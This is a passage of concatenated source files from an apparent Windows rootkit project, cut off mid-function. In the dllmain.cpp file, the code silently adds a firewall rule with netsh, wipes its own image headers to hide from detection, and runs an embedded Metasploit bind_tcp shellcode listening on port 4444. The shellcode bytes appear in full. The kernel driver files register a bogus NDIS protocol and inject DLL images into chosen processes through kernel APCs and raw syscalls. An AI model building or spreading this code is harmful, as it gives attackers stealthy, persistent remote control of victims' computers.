0x36,0x3a,0x3d,0x3a,0x50,0x3a,0x6f,0x3a,0x88,0x3a,0x92,0x3a,0x9d,0x3a,0x0f,0x3b, 0x18,0x3b,0x23,0x3b,0x8f,0x3b,0x98,0x3b,0xa3,0x3b,0xdc,0x3b,0xff,0x3b,0x09,0x3c, 0x2a,0x3c,0x34,0x3c,0x4e,0x3c,0x7c,0x3c,0x88,0x3c,0x92,0x3c,0xb0,0x3c,0xba,0x3c, 0xc5,0x3c,0xd7,0x3c,0xdd,0x3c,0xee,0x3c,0xf4,0x3c,0x06,0x3d,0x1b,0x3d,0x30,0x3d, 0x36,0x3d,0x40,0x3d,0x4a,0x3d,0x54,0x3d,0x5e,0x3d,0x68,0x3d,0x72,0x3d,0x7c,0x3d, 0x96,0x3d,0x9b,0x3d,0x17,0x3e,0x44,0x3e,0x8c,0x3e,0xcb,0x3e,0x0c,0x3f,0x6e,0x3f, 0x9b,0x3f,0xd1,0x3f,0x00,0x20,0x00,0x00,0xf4,0x00,0x00,0x00,0x10,0x30,0x51,0x30, 0xba,0x30,0x57,0x31,0x6c,0x31,0x78,0x31,0xbb,0x31,0xc5,0x31,0xe2,0x31,0x09,0x32, 0x1a,0x32,0x21,0x33,0x26,0x33,0x33,0x33,0x45,0x33,0x4e,0x33,0x56,0x33,0x5d,0x33, 0x63,0x33,0xb7,0x34,0xc6,0x34,0x10,0x35,0x27,0x35,0x3d,0x35,0x52,0x35,0x65,0x35, 0x70,0x35,0xb5,0x35,0xc2,0x35,0xda,0x35,0xec,0x35,0x05,0x36,0x16,0x36,0x55,0x36, 0x5b,0x36,0x70,0x36,0x83,0x36,0x89,0x36,0xc8,0x36,0xd7,0x36,0x34,0x37,0x3d,0x37, 0x51,0x37,0x58,0x37,0x5e,0x37,0x6f,0x37,0x7d,0x37,0x82,0x37,0x88,0x37,0x9a,0x37, 0x30,0x3b,0x3e,0x3b,0x6a,0x3b,0x82,0x3b,0xb7,0x3b,0xd1,0x3b,0xe4,0x3b,0xea,0x3b, 0xf0,0x3b,0xf6,0x3b,0xfc,0x3b,0x02,0x3c,0x08,0x3c,0x0e,0x3c,0x14,0x3c,0x1a,0x3c, 0x20,0x3c,0x26,0x3c,0x2c,0x3c,0x32,0x3c,0x38,0x3c,0x3e,0x3c,0x44,0x3c,0x4a,0x3c, 0x50,0x3c,0x56,0x3c,0x5c,0x3c,0x62,0x3c,0x68,0x3c,0x6e,0x3c,0x74,0x3c,0x7a,0x3c, 0x80,0x3c,0x86,0x3c,0x8c,0x3c,0x92,0x3c,0x98,0x3c,0x9e,0x3c,0xa4,0x3c,0xaa,0x3c, 0xb0,0x3c,0xb6,0x3c,0xbc,0x3c,0xc2,0x3c,0xc8,0x3c,0xce,0x3c,0xd4,0x3c,0xda,0x3c, 0xe4,0x3c,0xe8,0x3c,0xf4,0x3c,0xf8,0x3c,0x08,0x3d,0xa4,0x3d,0xa8,0x3d,0xac,0x3d, 0xb0,0x3d,0xb4,0x3d,0xb8,0x3d,0xbc,0x3d,0x97,0x3e,0xaa,0x3e,0xbf,0x3e,0xee,0x3e, 0xfd,0x3e,0x18,0x3f,0xc2,0x3f,0x00,0x00,0x00,0x30,0x00,0x00,0x6c,0x00,0x00,0x00, 0x2d,0x30,0xf8,0x30,0x60,0x31,0x6a,0x31,0x8d,0x31,0xd9,0x31,0xea,0x31,0x00,0x32, 0x16,0x32,0x48,0x32,0x57,0x32,0x74,0x32,0x11,0x36,0x1b,0x36,0x20,0x36,0x2a,0x36, 0x31,0x36,0x38,0x36,0x3f,0x36,0x46,0x36,0x4d,0x36,0x54,0x36,0x5b,0x36,0x62,0x36, 0x69,0x36,0x70,0x36,0x92,0x36,0xa2,0x36,0xff,0x36,0x0f,0x37,0x2c,0x37,0x5d,0x37, 0x6d,0x37,0xa0,0x37,0xd4,0x37,0xe7,0x37,0x17,0x38,0x3b,0x38,0x52,0x38,0x5e,0x38, 0xae,0x38,0xb9,0x38,0xc4,0x38,0xe0,0x38,0xe6,0x38,0xf3,0x38,0x0a,0x39,0x1b,0x39, 0x39,0x39,0x00,0x00,0x00,0x40,0x00,0x00,0x14,0x00,0x00,0x00,0x7e,0x3f,0x91,0x3f, 0xa6,0x3f,0xb7,0x3f,0xd6,0x3f,0xf7,0x3f,0x00,0x50,0x00,0x00,0x58,0x00,0x00,0x00, 0x2e,0x30,0x33,0x30,0x4f,0x30,0x5b,0x30,0x68,0x30,0x6e,0x30,0x78,0x30,0x89,0x30, 0x92,0x30,0xa5,0x30,0xab,0x30,0xbe,0x30,0xc4,0x30,0xd9,0x30,0xe3,0x30,0xe9,0x30, 0xfd,0x30,0x03,0x31,0x18,0x31,0x29,0x31,0x3f,0x31,0x49,0x31,0x63,0x31,0x76,0x31, 0x81,0x31,0x95,0x31,0xd5,0x31,0xe6,0x31,0xfb,0x31,0x0c,0x32,0x15,0x32,0xb4,0x32, 0x76,0x33,0x85,0x33,0x08,0x34,0x52,0x34,0x7c,0x34,0x87,0x34,0xde,0x34,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; ================================================ FILE: src/meterpreter/dllmain.cpp ================================================ #include "stdafx.h" #include "../meterpreter_config.h" #pragma comment(linker,"/ENTRY:DllMain") #pragma comment(linker,"/NODEFAULTLIB") //-------------------------------------------------------------------------------------- DWORD WINAPI ShellcodeThread(LPVOID lpParam) { typedef DWORD (WINAPI * SHELLCODE)(void); SHELLCODE Shellcode = (SHELLCODE)lpParam; // call shellcode return Shellcode(); } //-------------------------------------------------------------------------------------- DWORD WINAPI MainThread(LPVOID lpParam) { DWORD dwExit = 0; DbgMsg( __FILE__, __LINE__, __FUNCTION__"(): Thread %x:%x started\n", GetCurrentProcessId(), GetCurrentThreadId() ); DbgMsg(__FILE__, __LINE__, __FUNCTION__"(): Adding firewall rule for TCP port %d...\n", LISTEN_PORT); // add firewall rule to allow connections on meterpreter port char szCommandLine[MAX_PATH]; wsprintf(szCommandLine, "cmd.exe /C netsh firewall add portopening TCP %d " FIREWALL_RULE_NAME, LISTEN_PORT); UINT ExitCode = WinExec(szCommandLine, SW_HIDE); DbgMsg(__FILE__, __LINE__, __FUNCTION__"(): Done (exit code: %d)\n", ExitCode); // allocate memory for shellcode PVOID Buff = VirtualAlloc(NULL, sizeof(PAYLOAD), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (Buff) { DbgMsg( __FILE__, __LINE__, __FUNCTION__"(): Allocated %d bytes for payload at 0x%x\n", sizeof(PAYLOAD), Buff ); // copy shellcode RtlCopyMemory(Buff, PAYLOAD, sizeof(PAYLOAD)); // run payload in separate thread HANDLE hThread = CreateThread(NULL, 0, ShellcodeThread, Buff, 0, NULL); if (hThread) { WaitForSingleObject(hThread, INFINITE); CloseHandle(hThread); } else { DbgMsg(__FILE__, __LINE__, "CreateThread() ERROR %d\n", GetLastError()); } VirtualFree(Buff, 0, MEM_RELEASE); } else { DbgMsg(__FILE__, __LINE__, "VirtualAlloc() ERROR %d\n", GetLastError()); } // delete firewall rule DbgMsg(__FILE__, __LINE__, __FUNCTION__"(): Deleting firewall rule...\n"); ExitCode = WinExec("cmd.exe /C netsh advfirewall firewall delete rule name=" FIREWALL_RULE_NAME, SW_HIDE); DbgMsg(__FILE__, __LINE__, __FUNCTION__"(): Done (exit code: %d)\n", ExitCode); DbgMsg(__FILE__, __LINE__, __FUNCTION__"(): EXIT\n"); #ifdef _X86_ // free DLL image and exit current thread __asm { push dwExit /* argument for ExitThread() */ push MEM_RELEASE push 0 push lpParam /* address to free */ push dword ptr [ExitThread] /* ExitThread() as return address from VirtualFree() */ mov eax, dword ptr [VirtualFree] jmp eax } #else // _X86_ #error __FUNCTION__ is x86 only #endif // _X86_ return dwExit; } //-------------------------------------------------------------------------------------- void my_memset(void *mem, unsigned char val, size_t size) { for (size_t i = 0; i < size; i++) { ((unsigned char *)mem)[i] = i; } for (size_t i = 0; i < size; i++) { ((unsigned char *)mem)[i] ^= i; ((unsigned char *)mem)[i] += val; } } //-------------------------------------------------------------------------------------- BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: { char szProcessPath[MAX_PATH], szProcessUser[MAX_PATH]; DWORD dwUserLen = MAX_PATH; GetModuleFileName(GetModuleHandle(NULL), szProcessPath, MAX_PATH); GetUserName(szProcessUser, &dwUserLen); DbgMsg( __FILE__, __LINE__, __FUNCTION__"(): Injected into process \"%s\" (PID=%d), User = \"%s\"\n", szProcessPath, GetCurrentProcessId(), szProcessUser ); PIMAGE_NT_HEADERS32 pHeaders = (PIMAGE_NT_HEADERS32) ((PUCHAR)hModule + ((PIMAGE_DOS_HEADER)hModule)->e_lfanew); DWORD dwOldProt = 0; if (VirtualProtect(hModule, pHeaders->OptionalHeader.SizeOfHeaders, PAGE_READWRITE, &dwOldProt)) { // erase image headers my_memset(hModule, 0, pHeaders->OptionalHeader.SizeOfHeaders); } // run payload in separate thread HANDLE hThread = CreateThread(NULL, 0, MainThread, (PVOID)hModule, 0, NULL); if (hThread) { CloseHandle(hThread); } else { DbgMsg(__FILE__, __LINE__, "CreateThread() ERROR %d\n", GetLastError()); } break; } case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: { break; } } return TRUE; } //-------------------------------------------------------------------------------------- void Dummy(void) { MessageBox(0, " to exit...", __FUNCTION__"()", MB_ICONINFORMATION); ExitProcess(0); } //-------------------------------------------------------------------------------------- // EoF ================================================ FILE: src/meterpreter/meterpreter.cpp ================================================ // meterpreter.cpp : Defines the exported functions for the DLL application. // #include "stdafx.h" ================================================ FILE: src/meterpreter/meterpreter.def ================================================ EXPORTS Dummy ================================================ FILE: src/meterpreter/meterpreter.vcproj ================================================ ================================================ FILE: src/meterpreter/post_build.bat ================================================ @echo off if exist ..\meterpreter_debug.dll ..\bin2c.exe ..\meterpreter_debug.dll dll > ..\includes\meterpreter_debug.dll.h if exist ..\meterpreter.dll ..\bin2c.exe ..\meterpreter.dll dll > ..\includes\meterpreter.dll.h pause ================================================ FILE: src/meterpreter/stdafx.cpp ================================================ // stdafx.cpp : source file that includes just the standard includes // meterpreter.pch will be the pre-compiled header // stdafx.obj will contain the pre-compiled type information #include "stdafx.h" // TODO: reference any additional headers you need in STDAFX.H // and not in this file ================================================ FILE: src/meterpreter/stdafx.h ================================================ #pragma once #include "targetver.h" #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers #include #include "../common/debug.h" ================================================ FILE: src/meterpreter/targetver.h ================================================ #pragma once // The following macros define the minimum required platform. The minimum required platform // is the earliest version of Windows, Internet Explorer etc. that has the necessary features to run // your application. The macros work by enabling all features available on platform versions up to and // including the version specified. // Modify the following defines if you have to target a platform prior to the ones specified below. // Refer to MSDN for the latest info on corresponding values for different platforms. #ifndef WINVER // Specifies that the minimum required platform is Windows Vista. #define WINVER 0x0600 // Change this to the appropriate value to target other versions of Windows. #endif #ifndef _WIN32_WINNT // Specifies that the minimum required platform is Windows Vista. #define _WIN32_WINNT 0x0600 // Change this to the appropriate value to target other versions of Windows. #endif #ifndef _WIN32_WINDOWS // Specifies that the minimum required platform is Windows 98. #define _WIN32_WINDOWS 0x0410 // Change this to the appropriate value to target Windows Me or later. #endif #ifndef _WIN32_IE // Specifies that the minimum required platform is Internet Explorer 7.0. #define _WIN32_IE 0x0700 // Change this to the appropriate value to target other versions of IE. #endif ================================================ FILE: src/meterpreter_bind_tcp.h ================================================ /* * windows/meterpreter/bind_tcp - 298 bytes (stage 1) * http://www.metasploit.com * VERBOSE=false, LPORT=4444, RHOST=, EXITFUNC=thread, * AutoLoadStdapi=true, InitialAutoRunScript=, AutoRunScript=, * AutoSystemInfo=true, EnableUnicodeEncoding=true */ unsigned char bind_tcp_stage_1[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68" "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01" "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50" "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x31" "\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\xc2" "\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53" "\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d" "\x61\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff" "\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58" "\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9" "\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3"; ================================================ FILE: src/meterpreter_config.h ================================================ /** * Payload that should use to build DLL for injection * into the user-mode process. */ #include "meterpreter_bind_tcp.h" #define PAYLOAD bind_tcp_stage_1 #define LISTEN_PORT 4444 #define FIREWALL_RULE_NAME "System" ================================================ FILE: src/rootkit.sln ================================================  Microsoft Visual Studio Solution File, Format Version 10.00 # Visual Studio 2008 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "rootkit_installer", "rootkit_installer\rootkit_installer.vcproj", "{8A5187B5-EA41-4C34-8D5B-4213A281AAFB}" ProjectSection(ProjectDependencies) = postProject {3EEAAF60-1BCB-4114-8B75-168421CD9253} = {3EEAAF60-1BCB-4114-8B75-168421CD9253} EndProjectSection EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "rootkit_driver", "rootkit_driver\rootkit_driver.vcproj", "{3EEAAF60-1BCB-4114-8B75-168421CD9253}" ProjectSection(ProjectDependencies) = postProject {07D07B92-3F3F-4054-B224-E9D8324F1FAD} = {07D07B92-3F3F-4054-B224-E9D8324F1FAD} EndProjectSection EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "meterpreter", "meterpreter\meterpreter.vcproj", "{07D07B92-3F3F-4054-B224-E9D8324F1FAD}" EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|Win32 = Debug|Win32 Release|Win32 = Release|Win32 EndGlobalSection GlobalSection(ProjectConfigurationPlatforms) = postSolution {8A5187B5-EA41-4C34-8D5B-4213A281AAFB}.Debug|Win32.ActiveCfg = Debug|Win32 {8A5187B5-EA41-4C34-8D5B-4213A281AAFB}.Debug|Win32.Build.0 = Debug|Win32 {8A5187B5-EA41-4C34-8D5B-4213A281AAFB}.Release|Win32.ActiveCfg = Release|Win32 {8A5187B5-EA41-4C34-8D5B-4213A281AAFB}.Release|Win32.Build.0 = Release|Win32 {3EEAAF60-1BCB-4114-8B75-168421CD9253}.Debug|Win32.ActiveCfg = Debug|Win32 {3EEAAF60-1BCB-4114-8B75-168421CD9253}.Debug|Win32.Build.0 = Debug|Win32 {3EEAAF60-1BCB-4114-8B75-168421CD9253}.Release|Win32.ActiveCfg = Release|Win32 {3EEAAF60-1BCB-4114-8B75-168421CD9253}.Release|Win32.Build.0 = Release|Win32 {07D07B92-3F3F-4054-B224-E9D8324F1FAD}.Debug|Win32.ActiveCfg = Debug|Win32 {07D07B92-3F3F-4054-B224-E9D8324F1FAD}.Debug|Win32.Build.0 = Debug|Win32 {07D07B92-3F3F-4054-B224-E9D8324F1FAD}.Release|Win32.ActiveCfg = Release|Win32 {07D07B92-3F3F-4054-B224-E9D8324F1FAD}.Release|Win32.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE EndGlobalSection EndGlobal ================================================ FILE: src/rootkit_driver/bogusproto.cpp ================================================ #include "stdafx.h" // NDIS version: 5.1 #define NDIS51 1 extern "C" { #include } NDIS_HANDLE m_hBogusProtocol = NULL; //-------------------------------------------------------------------------------------- VOID OnBindAdapter( PNDIS_STATUS Status, NDIS_HANDLE BindContext, PNDIS_STRING DeviceNAme, PVOID SystemSpecific1, PVOID SystemSpecific2) { /* This function is a required driver function to support Plug and Play. */ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- VOID OnOpenAdapterComplete( NDIS_HANDLE ProtocolBindingContext, NDIS_STATUS Status, NDIS_STATUS OpenErrorStatus) { /* This function is a required driver function that completes processing of a binding operation for which NdisOpenAdapter returned NDIS_STATUS_PENDING. */ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- VOID OnUnbindAdapter( PNDIS_STATUS Status, NDIS_HANDLE ProtocolBindingContext, NDIS_HANDLE UnbindContext) { /* This function is a required function to support Plug and Play. */ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- VOID OnUnload(VOID) { #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- VOID OnCloseAdapterComplete( NDIS_HANDLE ProtocolBindingContext, NDIS_STATUS Status) { /* This function is a required driver function that completes processing for an unbinding operation for which NdisCloseAdapter returned NDIS_STATUS_PENDING. */ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- VOID OnResetComplete( NDIS_HANDLE ProtocolBindingContext, NDIS_STATUS Status) { /* This function is a required driver function that completes a protocol-initiated reset operation for which NdisReset returned NDIS_STATUS_PENDING. */ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- VOID OnRequestComplete( NDIS_HANDLE ProtocolBindingContext, PNDIS_REQUEST NdisRequest, NDIS_STATUS Status) { /* This function is a required driver function that completes the processing of a protocol-initiated query or set for which NdisRequest returned NDIS_STATUS_PENDING. */ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- VOID OnStatus( NDIS_HANDLE ProtocolBindingContext, NDIS_STATUS GeneralStatus, PVOID StatusBuffer, UINT StatusBufferSize) { /* This function is a required driver function that handles status-change notifications raised by an underlying connectionless network adapter driver or by NDIS. */ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- VOID OnStatusComplete(NDIS_HANDLE ProtocolBindingContext) { /* This function is a required driver function that completes a status-change operation initiated when the underlying driver called NdisMIndicateStatus. */ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- VOID OnSendComplete( NDIS_HANDLE ProtocolBindingContext, PNDIS_PACKET Packet, NDIS_STATUS Status) { /* This function is a required driver function that completes the processing of a protocol-initiated send previously passed to NdisSendPackets or NdisSend, which returned NDIS_STATUS_PENDING. */ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- VOID OnTransferDataComplete( NDIS_HANDLE ProtocolBindingContext, PNDIS_PACKET Packet, NDIS_STATUS Status, UINT BytesTransferred) { /* This function is a required driver function if the protocol might bind itself to an underlying connectionless network adapter driver that does not indicate full-packet receives with NdisMIndicateReceivePacket. ProtocolTransferDataComplete completes the processing of a protocol-initiated transfer-data request for which NdisTransferData returned NDIS_STATUS_PENDING. */ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- NDIS_STATUS OnReceive( NDIS_HANDLE ProtocolBindingContext, NDIS_HANDLE MacReceiveContext, PVOID HeaderBuffer, UINT HeaderBufferSize, PVOID LookAheadBuffer, UINT LookAheadBufferSize, UINT PacketSize) { /* This function is a required driver function in NDIS protocols that bind themselves to connectionless network adapter drivers. ProtocolReceive determines whether a received network packet is of interest to the protocol's clients and, if so, copies the indicated data and, possibly, calls NdisTransferData to retrieve the rest of the indicated packet. */ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif return STATUS_SUCCESS; } //-------------------------------------------------------------------------------------- VOID OnReceiveComplete(NDIS_HANDLE ProtocolBindingContext) { /* This function is a required driver function in any protocol. ProtocolReceiveComplete completes post-processing of one or more preceding receive indications from a network adapter driver. */ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- INT OnReceivePacket( NDIS_HANDLE ProtocolBindingContext, PNDIS_PACKET Packet) { /* ProtocolReceivePacket is an optional driver function that processes receive indications made by underlying connectionless NIC driver(s) that call either NdisMIndicateReceivePacket with packet arrays because the underlying driver supports multipacket receive indications or with individual packets that have associated out-of-band information. A call to ProtocolReceivePacket can also occur as a result of loopback. */ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif return STATUS_SUCCESS; } //-------------------------------------------------------------------------------------- NDIS_STATUS OnPnPHandler( NDIS_HANDLE ProtocolBindingContext, PNET_PNP_EVENT pNetPnPEvent) { #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif return STATUS_SUCCESS; } //-------------------------------------------------------------------------------------- NDIS_STATUS OnPnPNetEventReconfigure( ULONG pAdapt, PNET_PNP_EVENT pNetPnPEvent) { #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif return STATUS_SUCCESS; } //-------------------------------------------------------------------------------------- NDIS_STATUS OnPnPNetEventSetPower( ULONG pAdapt, PNET_PNP_EVENT pNetPnPEvent) { #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif return STATUS_SUCCESS; } //-------------------------------------------------------------------------------------- NDIS_HANDLE BogusProtocolRegister(void) { if (m_hBogusProtocol) { #ifdef DBG_NDIS_PROT // protocol is allready registered DbgMsg(__FUNCTION__"(): Protocol is allready registered\n"); #endif return m_hBogusProtocol; } NDIS_STATUS status = STATUS_SUCCESS; NDIS_PROTOCOL_CHARACTERISTICS Protocol; // fill protocol characteristics structure NdisZeroMemory(&Protocol, sizeof(Protocol)); Protocol.Ndis40Chars.MajorNdisVersion = 0x05; Protocol.Ndis40Chars.MinorNdisVersion = 0x0; Protocol.Ndis40Chars.OpenAdapterCompleteHandler = OnOpenAdapterComplete; Protocol.Ndis40Chars.CloseAdapterCompleteHandler = OnCloseAdapterComplete; Protocol.Ndis40Chars.SendCompleteHandler = OnSendComplete; Protocol.Ndis40Chars.TransferDataCompleteHandler = OnTransferDataComplete; Protocol.Ndis40Chars.ResetCompleteHandler = OnResetComplete; Protocol.Ndis40Chars.RequestCompleteHandler = OnRequestComplete; Protocol.Ndis40Chars.ReceiveHandler = OnReceive; Protocol.Ndis40Chars.ReceiveCompleteHandler = OnReceiveComplete; Protocol.Ndis40Chars.StatusHandler = OnStatus; Protocol.Ndis40Chars.StatusCompleteHandler = OnStatusComplete; Protocol.Ndis40Chars.BindAdapterHandler = OnBindAdapter; Protocol.Ndis40Chars.UnbindAdapterHandler = OnUnbindAdapter; Protocol.Ndis40Chars.UnloadHandler = OnUnload; Protocol.Ndis40Chars.ReceivePacketHandler = OnReceivePacket; Protocol.Ndis40Chars.PnPEventHandler = OnPnPHandler; NDIS_STRING ProtocolName; NdisInitUnicodeString(&ProtocolName, L"BogusProto"); Protocol.Ndis40Chars.Name = ProtocolName; // register our bogus protocol NdisRegisterProtocol( &status, &m_hBogusProtocol, &Protocol, sizeof(Protocol) ); if (status != NDIS_STATUS_SUCCESS) { DbgMsg("NdisRegisterProtocol() fails; status: 0x%.8x\n", status); return NULL; } #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"(): Protocol registered\n"); #endif return m_hBogusProtocol; } //-------------------------------------------------------------------------------------- void BogusProtocolUnregister(void) { if (m_hBogusProtocol) { NDIS_STATUS status = STATUS_SUCCESS; NdisDeregisterProtocol(&status, m_hBogusProtocol); m_hBogusProtocol = NULL; } } //-------------------------------------------------------------------------------------- // EoF ================================================ FILE: src/rootkit_driver/bogusproto.h ================================================ NDIS_HANDLE BogusProtocolRegister(void); void BogusProtocolUnregister(void); ================================================ FILE: src/rootkit_driver/debug.h ================================================ #ifdef DBGMSG // debug messages is on #define DbgMsg DbgPrint #else #define DbgMsg #endif ================================================ FILE: src/rootkit_driver/dll_inject.cpp ================================================ #include "stdafx.h" #include "dll_inject_shellcode.h" ULONG SDT_NtProtectVirtualMemory = 0; int m_KTHREAD_ApcState = -1; KEVENT m_ApcEvent; //-------------------------------------------------------------------------------------- #ifdef _X86_ __declspec(naked) NTSTATUS NTAPI _ZwProtectVirtualMemory( HANDLE ProcessHandle, PVOID *BaseAddress, PSIZE_T NumberOfBytesToProtect, ULONG NewAccessProtection, PULONG OldAccessProtection) { __asm { cmp SDT_NtProtectVirtualMemory, 0 jz _failed mov eax, SDT_NtProtectVirtualMemory lea edx, [esp + 4] int 0x2e retn 0x14 _failed: mov eax, 0xc00000001 retn 0x14 } } #endif // _X86_ //-------------------------------------------------------------------------------------- ULONG GetShellcodeSize(PVOID Data) { ULONG Size = 0; PULONG Ptr = (PULONG)Data; // get size of shellcode while (*Ptr != ENDM) { Size += 1; // check for end marker Ptr = (PULONG)((ULONG)Ptr + 1); } return Size; } //-------------------------------------------------------------------------------------- void InjectKernelApcRoutine( struct _KAPC *Apc, PKNORMAL_ROUTINE *NormalRoutine, PVOID *NormalContext, PVOID *SystemArgument1, PVOID *SystemArgument2) { DbgMsg(__FUNCTION__"()\n"); KeSetEvent(&m_ApcEvent, 0, FALSE); } //-------------------------------------------------------------------------------------- BOOLEAN InjectFindProcess(PWSTR ProcessName, ULONG ProcessId, PKTHREAD *pThread, PEPROCESS *pProcess) { BOOLEAN bRet = FALSE; UNICODE_STRING usProcessName; if (ProcessName) { RtlInitUnicodeString(&usProcessName, ProcessName); } *pThread = NULL; *pProcess = NULL; PSYSTEM_PROCESSES_INFORMATION pProcessesInfo = (PSYSTEM_PROCESSES_INFORMATION) RuntimeGetSystemInformation(SystemProcessInformation); if (pProcessesInfo) { PSYSTEM_PROCESSES_INFORMATION pInfo = pProcessesInfo; // iterate processes list while (pInfo) { if (pInfo->ProcessName.Buffer && pInfo->ThreadCount > 0) { // match by process name or ID if ((ProcessName != NULL && RtlEqualUnicodeString(&pInfo->ProcessName, &usProcessName, TRUE)) || (ProcessId != 0 && pInfo->ProcessId == ProcessId)) { DbgMsg( __FUNCTION__"(): \"%wZ\", PID = %d\n", &pInfo->ProcessName, pInfo->ProcessId ); NTSTATUS ns = PsLookupThreadByThreadId( pInfo->Threads[0].ClientId.UniqueThread, (PETHREAD *)pThread ); if (!NT_SUCCESS(ns)) { DbgMsg("PsLookupProcessByProcessId() ERROR; status: 0x%.8x\n", ns); } ns = PsLookupProcessByProcessId( (HANDLE)pInfo->ProcessId, pProcess ); if (!NT_SUCCESS(ns)) { DbgMsg("PsLookupProcessByProcessId() ERROR; status: 0x%.8x\n", ns); } if (*pThread && *pProcess) { bRet = TRUE; break; } else { if (*pThread) { ObDereferenceObject(*pThread); *pThread = NULL; } if (*pProcess) { ObDereferenceObject(*pProcess); *pProcess = NULL; } } } } if (pInfo->NextEntryDelta == 0) { // end of the list break; } pInfo = (PSYSTEM_PROCESSES_INFORMATION)((PUCHAR)pInfo + pInfo->NextEntryDelta); } ExFreePool(pProcessesInfo); } return bRet; } //-------------------------------------------------------------------------------------- BOOLEAN ImjectMapDllImage(HANDLE hProcess, PVOID Data, ULONG DataSize, PVOID *pRetImage) { PIMAGE_NT_HEADERS pHeaders = (PIMAGE_NT_HEADERS)RVATOVA( Data, ((PIMAGE_DOS_HEADER)Data)->e_lfanew ); PVOID Image = NULL; ULONG ImageSize = pHeaders->OptionalHeader.SizeOfImage; // allocate memory for image NTSTATUS ns = ZwAllocateVirtualMemory( hProcess, (PVOID *)&Image, 0, &ImageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE ); if (NT_SUCCESS(ns)) { DbgMsg(__FUNCTION__"(): Memory for image allocated at "IFMT"\n", Image); __try { // copy headers RtlZeroMemory(Image, ImageSize); RtlCopyMemory(Image, Data, pHeaders->OptionalHeader.SizeOfHeaders); // copy sections PIMAGE_SECTION_HEADER pSection = (PIMAGE_SECTION_HEADER) 